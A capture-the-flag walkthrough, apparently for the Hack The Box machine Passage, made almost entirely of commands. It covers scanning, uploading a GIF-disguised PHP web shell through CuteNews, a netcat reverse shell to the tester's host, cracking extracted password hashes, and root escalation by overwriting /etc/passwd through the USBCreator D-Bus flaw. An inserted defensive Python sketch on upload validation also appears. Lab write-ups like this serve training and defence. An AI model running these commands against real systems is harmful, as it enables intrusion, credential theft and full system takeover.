nmap -A -p- -oA output 10.129.150.170 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA passage 10.129.150.170

nmap -sU -O -p- -oA passage-udp 10.129.150.170

nikto -h 10.129.150.170:80

whatweb http://10.129.150.170

nmap --script http-enum -p80 10.129.150.170 -oN webScan -Pn

http://10.129.150.170

We see CuteNews

http://10.129.150.170/CuteNews

searchsploit CuteNews 2.1

http://10.129.150.170/CuteNews/?register

searchsploit -m 48800

cat cmd.php

ghex cmd.php

We prepend GIF8; to the start of the file so that it begins with a GIF signature

file cmd.php

http://10.129.150.170/CuteNews/index.php

We edit our profile

We click "Browse" and upload the file cmd.php
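
Why the GIF8; prefix matters, as an added example that is not part of the original write-up or CuteNews's own code: a check that trusts only the leading bytes accepts the file, while an extension allow-list with structural validation and a server-chosen name rejects it. `magic_only_check` is an assumed stand-in for a signature-only test; every function name and sample byte string here is constructed for illustration.

```python
import os
import struct

ALLOWED_EXT = {".gif"}  # this sketch validates GIF avatars only

def magic_only_check(data: bytes) -> bool:
    """Weak check (assumed stand-in): trusts the first four bytes."""
    return data.startswith(b"GIF8")

def strict_gif_check(filename: str, data: bytes) -> bool:
    """Hardened check: extension allow-list plus GIF structure validation."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False                  # a .php client name is rejected here
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        return False                  # "GIF8;" is not a complete signature
    if len(data) < 14 or data[-1:] != b"\x3b":
        return False                  # too short, or missing the GIF trailer
    width, height = struct.unpack("<HH", data[6:10])
    return width > 0 and height > 0   # logical screen must be non-empty

def stored_name(user_id: int) -> str:
    """Server-chosen name: never reuse the client's filename or extension."""
    return f"avatar_{user_id}.gif"

# Constructed samples (not taken from the page).
POLYGLOT = b"GIF8;<?php /* placeholder body */ ?>"
TINY_GIF = (
    b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x80\x00\x00"  # header, 1x1 screen
    + b"\x00\x00\x00\xff\xff\xff"                           # 2-colour table
    + b"\x2c" + struct.pack("<HHHH", 0, 0, 1, 1) + b"\x00"  # image descriptor
    + b"\x02\x02\x44\x01\x00"                               # LZW image data
    + b"\x3b"                                               # trailer
)

if __name__ == "__main__":
    for name, blob in (("cmd.php", POLYGLOT), ("me.gif", TINY_GIF)):
        print(name, "weak:", magic_only_check(blob),
              "strict:", strict_gif_check(name, blob))
```

A structurally valid image can still carry embedded script text, so the controls that matter most are the server-chosen `.gif` name and an uploads directory where the web server does not execute PHP.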

echo "10.129.150.170 passage.htb" | sudo tee -a /etc/hosts

http://10.129.150.170/CuteNews/uploads/avatar_cu3rv0x_cmd.php?cmd=nc -e /bin/bash 10.10.14.45 443

nc -lvnp 443

shred -zun 10 -v avatar_cu3rv0x_cmd.php

Then we log in

https://github.com/CuteNews/cutenews-2.0

We look at how CuteNews is structured

cd /var/www/html/CuteNews/cdata/users

We start a Python shell

import hashlib
hashlib.md5(b"cu3rv0x").hexdigest()

We see that the first two digits are 22.

So we cat 22.php, which would hold the information for cu3rv0x, since CuteNews does not use a database.

cat * | grep -v "denied" | base64 -d; echo

We create a file credentials.txt and put the credentials in it.

vim credentials.txt

cat credentials.txt | awk '{print $2}' FS=":"

cat credentials.txt | awk '{print $2}' FS=":" | xclip -sel clip

We go to CrackStation and enter the credentials

credentials -> paul:atlanta1

su paul

cd ~/.ssh

cat authorized_keys

grep "sh$" /etc/passwd

lsattr

ssh nadav@localhost

whoami

id

ls -al

cat .viminfo

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/file.txt /file.txt true

cp /etc/passwd .

openssl passwd

We create a password. I used "test"

In passwd we replace the x with 9AyQs.WYSYTuE

And we save the file

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/passwd /etc/passwd true

su root

We enter the password we created with openssl

copyright©2022 Cu3rv0x all rights reserved